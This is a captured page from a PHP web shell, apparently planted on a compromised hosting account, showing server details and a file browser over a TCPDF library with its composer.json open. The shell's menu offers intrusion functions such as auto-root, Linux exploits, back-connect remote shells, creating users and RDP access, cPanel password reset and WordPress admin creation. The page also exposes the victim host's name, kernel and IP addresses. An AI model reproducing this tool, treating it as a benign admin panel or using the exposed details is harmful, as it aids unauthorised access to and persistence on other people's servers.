Linux aries.aptans.com 4.18.0-348.20.1.lve.1.el8.x86_64 #1 SMP Wed Mar 16 08:45:39 EDT 2022 x86_64
Apache
: 135.181.142.107 | : 172.69.17.196
Cant Read [ /etc/named.conf ]
7.4.33
aja
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
home /
aja /
public_html /
ead /
lib /
tcpdf /
[ HOME SHELL ]
Name
Size
Permission
Action
config
[ DIR ]
drwxr-xr-x
fonts
[ DIR ]
drwxr-xr-x
include
[ DIR ]
drwxr-xr-x
CHANGELOG.TXT
113.97
KB
-rw-r--r--
LICENSE.TXT
42.66
KB
-rw-r--r--
README.md
4.66
KB
-rw-r--r--
composer.json
1017
B
-rw-r--r--
readme_moodle.txt
3.07
KB
-rw-r--r--
tcpdf.php
879.39
KB
-rw-r--r--
tcpdf_autoconfig.php
6.99
KB
-rw-r--r--
tcpdf_barcodes_1d.php
71.68
KB
-rw-r--r--
tcpdf_barcodes_2d.php
14.34
KB
-rw-r--r--
tcpdf_parser.php
26.99
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : composer.json
{ "name": "tecnickcom/tcpdf", "version": "6.3.2", "homepage": "http://www.tcpdf.org/", "type": "library", "description": "TCPDF is a PHP class for generating PDF documents and barcodes.", "keywords": [ "PDF", "tcpdf", "PDFD32000-2008", "qrcode", "datamatrix", "pdf417", "barcodes" ], "license": "LGPL-3.0", "authors": [ { "name": "Nicola Asuni", "email": "info@tecnick.com", "role": "lead" } ], "require": { "php": ">=5.3.0" }, "autoload": { "classmap": [ "config", "include", "tcpdf.php", "tcpdf_parser.php", "tcpdf_barcodes_1d.php", "tcpdf_barcodes_2d.php", "include/tcpdf_colors.php", "include/tcpdf_filters.php", "include/tcpdf_font_data.php", "include/tcpdf_fonts.php", "include/tcpdf_images.php", "include/tcpdf_static.php", "include/barcodes/datamatrix.php", "include/barcodes/pdf417.php", "include/barcodes/qrcode.php" ] } }
Close